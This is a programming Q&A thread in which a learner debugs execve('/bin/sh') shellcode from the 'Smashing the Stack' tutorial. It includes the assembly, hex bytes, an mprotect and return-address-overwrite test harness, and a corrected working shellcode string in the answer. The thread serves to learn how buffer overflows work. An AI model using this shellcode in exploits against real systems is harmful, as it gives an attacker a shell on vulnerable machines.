
I am trying to implement the code given in "Smashing the Stack for Fun and Profit" by Aleph to learn the basics of buffer overflow attacks.

Machine architecture: Ubuntu 12.10, 64-bit

Programs compiled using the -m32 flag in gcc.

So far, I have managed to spawn a shell using the assembly instructions. The next step is to convert those instructions into hexadecimal code, where I have encountered this problem. The assembly code for spawning the shell:

int main(void) {
    /* 32-bit (-m32) AT&T syntax. The jmp/call/pop sequence loads the address
       of the trailing "/bin/sh" string into %esi without any absolute address
       appearing in the code. */
    __asm__(
        "Start:\n\t"
        "jmp    CallCode\n\t"
        "CallPop:\n\t"
        "popl   %esi\n\t"             /* %esi = address of "/bin/sh" */
        "movl   %esi,0x8(%esp)\n\t"   /* argv[0] = "/bin/sh" */
        "xorl   %eax,%eax\n\t"        /* %eax = 0 */
        "movb   %al,0x7(%esp)\n\t"
        "movl   %eax,0xc(%esp)\n\t"   /* argv[1] = NULL (also used as envp) */
        "movb   $0xb,%al\n\t"         /* execve system call number */
        "movl   %esi,%ebx\n\t"        /* %ebx = filename */
        "leal   0x8(%esp),%ecx\n\t"   /* %ecx = argv */
        "leal   0xc(%esp),%edx\n\t"   /* %edx = envp */
        "int    $0x80\n\t"
        "xorl   %ebx,%ebx\n\t"        /* if execve returns: exit(0) */
        "movl   %ebx,%eax\n\t"
        "inc    %eax\n\t"             /* %eax = 1, exit system call number */
        "int    $0x80\n\t"
        "CallCode:\n\t"
        "call   CallPop\n\t"          /* pushes the address of the string below */
        ".string \"/bin/sh\"\n\t"
    );
    return 0;
}

The corresponding hex code is:

#include <sys/mman.h>
#include <stdio.h>

#define PAGE_SIZE 4096U

/* Hand-translated bytes of the assembly above (the string this question is about). */
char shellcode[] = "\xeb\x24\x5e\x89\x74\x24\x08\x31\xc0\x88\x44\x24\x07\x89\x44\x24\x0c\xb0"
"\x0b\x89\xf3\x8d\x4c\x24\x08\x8d\x54\x24\x0c\xcd"
"\x80\x31\x89\xd8\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";


void test_shellcode() {

    int *ret;

    // The data section is non-executable:
    // change the protection bits for the page(s) containing our shellcode
    // (the pointer-to-unsigned-int cast relies on 32-bit pointers, i.e. -m32)
    mprotect((void *)((unsigned int)shellcode & ~(PAGE_SIZE - 1)),
             2 * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC);

    // Overwrite this function's saved return address (offset from &ret found
    // with gdb) so that returning from test_shellcode jumps into shellcode
    ret = (int*)((char *)&ret + 16);
    (*ret) = (int)shellcode;
}

int main() {
    test_shellcode();
    return 0;
}

A bit of analysis using the GDB debugger led me to these results:

(gdb) run
Starting program: /home/peps/CCPP/Hello/testsc3 

Program received signal SIGILL, Illegal instruction.
0x0804a067 in shellcode ()
(gdb) x/s 0x0804a067
0x804a067 <shellcode+39>:   "\377\377\377/bin/sh"

After applying breakpoints, I think the problem lies somewhere in the hex code, but I have not been able to figure it out. Also, I don't seem to understand the context of "Illegal instruction" here.

Any help would be appreciated.

  • gdb is able to disassemble machine code (e.g. with dis or x/i) Commented May 8, 2013 at 12:17
  • I have used the disassemble command a fair number of times; in fact, the assembly code it generated has been used in the first code, and it was also quite useful in finding the return addresses. But how to make use of it for finding the problem in the hex code, I am out of ideas here. Commented May 8, 2013 at 12:25

1 Answer


You made a couple of mistakes in your shellcode.

char shellcode[] = 
"\xeb\x24\x5e\x89\x74\x24\x08\x31"
"\xc0\x88\x44\x24\x07\x89\x44\x24"
"\x0c\xb0\x0b\x89\xf3\x8d\x4c\x24"
"\x08\x8d\x54\x24\x0c\xcd\x80\x31"
"\xdb\x89\xd8\x40\xcd\x80\xe8\xd7"   /* 31 db = xorl %ebx,%ebx; the \xdb byte was missing */
"\xff\xff\xff/bin/sh";
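As an added check that is not part of the question or the answer, the following Python decodes the two relative branches (the short jmp at offset 0 and the call it should land on) in both byte strings from this page and reports where they land. It shows why the asker's string faults at shellcode+39 while the corrected one reaches the call and the popl; the byte strings are copied from the page, everything else is constructed here.

```python
# Added example (not the question's or the answer's code): follow the jmp/call
# pair in the page's two shellcode strings to see where execution goes.
import struct

# The asker's string (missing the \xdb of "xorl %ebx,%ebx").
BUGGY = (b"\xeb\x24\x5e\x89\x74\x24\x08\x31\xc0\x88\x44\x24\x07\x89\x44\x24\x0c\xb0"
         b"\x0b\x89\xf3\x8d\x4c\x24\x08\x8d\x54\x24\x0c\xcd"
         b"\x80\x31\x89\xd8\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh")

# The accepted answer's corrected string.
FIXED = (b"\xeb\x24\x5e\x89\x74\x24\x08\x31"
         b"\xc0\x88\x44\x24\x07\x89\x44\x24"
         b"\x0c\xb0\x0b\x89\xf3\x8d\x4c\x24"
         b"\x08\x8d\x54\x24\x0c\xcd\x80\x31"
         b"\xdb\x89\xd8\x40\xcd\x80\xe8\xd7"
         b"\xff\xff\xff/bin/sh")


def analyze(sc):
    """Decode the 'jmp CallCode' at offset 0 and the 'call CallPop' it targets.

    Returns the jmp target, the opcode byte found there, the call target
    (None if the jmp did not land on an E8 call) and the string whose address
    the call pushes, i.e. what 'popl %esi' would receive.
    """
    assert sc[0] == 0xEB, "expected a short jmp at offset 0"
    rel8 = struct.unpack("b", sc[1:2])[0]          # signed 8-bit displacement
    jmp_target = 2 + rel8                           # relative to the next instruction
    result = {"jmp_target": jmp_target, "opcode_at_target": sc[jmp_target],
              "call_target": None, "string": None}
    if sc[jmp_target] != 0xE8:
        # Landed mid-instruction: the CPU decodes whatever bytes are here.
        return result
    rel32 = struct.unpack("<i", sc[jmp_target + 1:jmp_target + 5])[0]
    result["call_target"] = jmp_target + 5 + rel32  # should be the popl at offset 2
    pushed = jmp_target + 5                         # return address pushed by call
    end = sc.find(b"\x00", pushed)                  # .string adds a NUL in the C array
    result["string"] = sc[pushed:] if end < 0 else sc[pushed:end]
    return result


if __name__ == "__main__":
    for name, sc in (("buggy", BUGGY), ("fixed", FIXED)):
        r = analyze(sc)
        print(name, "jmp ->", r["jmp_target"], "opcode %#04x" % r["opcode_at_target"],
              "call ->", r["call_target"], "string", r["string"])
```

For the asker's string the jmp lands on offset 38, which is the 0xd7 displacement byte of the call rather than its 0xe8 opcode; the 0xff 0xff bytes that follow at offset 39 are not a valid instruction, matching the SIGILL gdb reported at shellcode+39.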

1 Comment

It worked!! Thanks a lot!! What a silly, silly error that was! My bad!!
